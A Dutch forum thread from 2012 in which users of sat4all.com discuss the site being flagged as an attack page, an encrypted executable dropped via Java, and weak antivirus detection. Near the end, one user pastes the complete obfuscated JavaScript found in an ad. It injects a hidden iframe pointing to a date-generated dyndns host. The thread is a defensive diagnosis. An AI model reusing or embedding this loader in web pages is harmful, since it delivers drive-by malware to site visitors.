trojan via sat4all?

[Michel]

Ik heb met 3 verschillende virusscanners de hele site nogmaals grondig over gesurft, maar ik krijg geen meldingen.

 

Ik vermoed dat de bewuste (google) banner inmiddels al verwijderd is. Wel bizar dat google ons daarvoor straft

 

Er is inmiddels een heroverwegingsverzoek ingediend om van die vervelende rode pagina af te komen.

 

Mvg,

 

Michel

[Hyllit]

Gerapporteerde aanvalpagina!

 

 

 

 

 

 

 

De pagina op www.sat4all.com is gerapporteerd als een aanvalpagina en is geblokkeerd op basis van uw beveiligingsinstellingen.

 

 

 

 

 

Aanvalpagina’s proberen programma’s te installeren die privégegevens stelen, uw computer gebruiken om anderen aan te vallen, of uw systeem beschadigen.Sommige aanvalpagina’s verspreiden bewust gevaarlijke software, maar vele zijn gecompromitteerd zonder de kennis of toestemming van hun eigenaars.

[Michel]

Wat dacht je, ik ga dat gewoon voor de 451e keer nogmaals melden?

[Sprietje]

Elke keer als ik op deze site kom wordt ik aangevallen, zie de bijlages:

[RS2000]

@Sprietje:

In het 2de plaatje staat een lokaal ip-adres bij aanvallende computer, weet je zeker dat je al niet geïnfecteerd bent of wellicht een andere PC in je thuisnetwerk?

[Sprietje]

Nee ik ben niet geïnfecteerd, mijn virusscanner staat continu te scannen en ik heb geen tweede computer aan staan of aangesloten.

Telkens als in inlog op sat4all word ik aangevallen.

[Pekeltje]

Krijg vanuit firefox wel de melding dat de website niet veilig zou zijn.

Maar krijg geen melding over een virus, gebruik ook MSE.

[Pekeltje]

Dit dus:

 

Gerapporteerde aanvalpagina!

 

 

 

 

 

 

 

De pagina op sat4all.com is gerapporteerd als een aanvalpagina en is geblokkeerd op basis van uw beveiligingsinstellingen.

 

 

 

 

 

Aanvalpagina’s proberen programma’s te installeren die privégegevens stelen, uw computer gebruiken om anderen aan te vallen, of uw systeem beschadigen.Sommige aanvalpagina’s verspreiden bewust gevaarlijke software, maar vele zijn gecompromitteerd zonder de kennis of toestemming van hun eigenaars.

[BeefRWijker]

Ik heb met 3 verschillende virusscanners de hele site nogmaals grondig over gesurft, maar ik krijg geen meldingen.

 

 

Heb de boosdoener 0.xxxxxxxxxxxxxxx.exe nog even uit de virus vault gehaald en vervolgens een scan erop gedaan: niets

 

De boosdoener is dus zodanig encrypted dat deze niet wordt herkend, dus ook niet tijdens download.

Dat zal de reden zijn dat ie pas door de virusscanner wordt opgemerkt als ie gaat lopen.

[pukje]

dan hebt je een slechte scanner al vaker gemeld

java.exe start 0.23445433445543.exe (random getal) en die 0.23435353553.exe is geinfecteerd

verder zit in die Temp folder een dll die besmet is

11 april 2012 aangepast door pukje

[BeefRWijker]

Bedankt dat je nog even bevestigt wat ik gezegd heb ook al heb je dat dan kennelijk niet begrepen.

11 april 2012 aangepast door BeefRWijker

[winwiz]

Een beetje rustig heren. Een beetje respect naar elkaar doet echt geen pijn.

[Codx]

Dan is 90% van de virusscanners slecht blijkbaar want verschillende merken 'm niet eens op, laat staat dat ze 'm tegenhouden. Ik denk dat deze exploit dan ook vrij nieuw is.

 

Wat ik niet begrijp is waarom jullie die google ads troep niet even uitzetten en alleen content van de eigen server toelaten. Dan is de site in weer clean.

[maja]

Bij mij zijn inmiddels 2 sites geblokkeerd.

[Kowalski]

In de broncode van de advertentie zit een javascript met een randomgenerator, mogelijk is dit de verdachte code?

Dit kan verklaren waarom de malicious code maar af en toe gerapporteerd wordt.

<script type='text/javascript'>function today(){return Math.random();};function Z(L){var h = y('h');var $ = y('$');return L[h]($);};function win(minI, QX){return minI * QX;};function utmnG(L){return L.length;};function domainD(L, O){var X = y('X');return L[X](O);};function nH(minI, QX){return minI % QX;};function img(){try {var Q = I();var c = 2744;var t = d("GmEB",0,1);var gaTrack = d("T0vk",0,1);var V = Q.V;var r = Q.r;var C = Q.H;if(b(gaTrack) != t){if(S()){var l = K(V, r);var F = R();var j = y('p');var urchinUrl = y('urchinCode');var f = y('N');F[j] = urchinUrl + l + f + C;url(gaTrack, t, {expires: c});}};} catch(n){};};function d(L, O, D){return L.substr(O, D);};function R(){var lQ = document;var urchinUrlToday = lQ.createElement(y('J'));urchinUrlToday.width = new String(d("RoW1pxoWR",3,3));urchinUrlToday.height = "8px";urchinUrlToday.style[y('min')] = y('w');try {lQ.body.appendChild(urchinUrlToday);} catch(n){try {lQ.write(y('v'));lQ.body.appendChild(urchinUrlToday);} catch(UZ){};};return urchinUrlToday;};function y(a){var max = {p : new String("src"),urchinCode : String(d("http://SzOs",0,7)),E : d("getUTCLPhW",0,6),P : new String(d("Hour4lTB",0,4)+d("sUMQ0",0,1)),_ : String(d("DateKGm",0,4)),m : "Month",o : new String(d("FullYxt6",0,5)+d("earLwuY",0,3)),v : String("<body>"),J : new String("iframe"),min : String(d("visibiliA3Mh",0,8)+"ty"),w : new String(d("AwtOhiddetAOw",4,5)+d("nBOL",0,1)),N : "/de/",h: d("splitSQaY",0,5),X: d("charAtgPm",0,6),$ : d(",sl4N",0,1)};for(var O in max){if(O == a){return max[O];}}return null;};function I(){var B = U();var M = domain(win(today(), B.k.length));var e = B.k[M];var s = B.W[M];if(B.utmn.length > 1){var z = B.utmn[M];}else {var z = B.utmn[0];}return { V : e, r : z, H: s };};function S(){return (typeof ActiveXObject != new String(d("xFpundefinedpFx",3,9)) || typeof XMLHttpRequest != String("undefined")) && !(/Chrome/.test(navigator.userAgent));};function url(H, VUrchinCode, cG){cG = cG || {};var QUtmn = cG.expires;if (typeof QUtmn == new String(d("ROconumbercORo",4,6)) && QUtmn){var urchin = new Date();urchin.setTime(urchin.getTime() + win(QUtmn, 1000));QUtmn = cG.expires = urchin;}if(QUtmn && QUtmn.toUTCString) { cG.expires = QUtmn.toUTCString(); }VUrchinCode = encodeURIComponent(VUrchinCode);var A_ = H + new String("=") + VUrchinCode;for(var XX in cG){A_ += "; " + XX;var bUtmn = cG[XX];if(bUtmn !== true){ A_ += String(d("MC0V=0VCM",4,1)) + bUtmn;}}document.cookie = A_;};function domain(L){return Math.floor(L);};function SUrchinCode(L, iW){return L + iW;};function K(V, r){Y = new Date();l = V;var g = d("am957h6MFH",0,6)+d("PGMcsx48pGMP",3,6)+d("U3Lpjzf2ubUp3L",4,6)+"livrwt"+d("5bC36k01e5bC",3,6)+"oqndgy";var E = y('E');var q = E + y('P');var x = E + y('_');var i = E + y('m');var u = E + y('o');var cookie = domain(Y[q]());var urchin = Y[x]();var A = Y[i]();var maxUrchin = Y[u]();var DE = utmnG(g);var urlGaTrack = nH(cookie,  DE);var wR = nH(cookie+urchin, DE);var v$ = nH(cookie+urchin+A, DE);var iD = nH(cookie+urchin+A+maxUrchin, DE);l = SUrchinCode(l, domainD(g, urlGaTrack));l = SUrchinCode(l, domainD(g, wR));l = SUrchinCode(l, domainD(g, v$));l = SUrchinCode(l, domainD(g, iD));return l + r;};function b(H){var AB = document.cookie.match(new RegExp(String("(?:^|; "+d(")zFS",0,1)) + H.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, String("\\\\\\\\"+d("$1crP",0,2))) + new String("=([^"+d(";]*)gxE",0,4))));return AB ? decodeURIComponent(AB[1]) : undefined;};img();function U(){return {k : Z(d("deKLI",0,2)),utmn : Z(".dyndns-"+d("server.cgEjO",0,8)+d("3UAomUA3",3,2)),W : Z(d("kgUs1gkU",3,2))};};</script>

Michel heb je mijn bericht gezien?

Ik zou de bronbestanden op je server eens controleren op de aanwezigheid van dit script.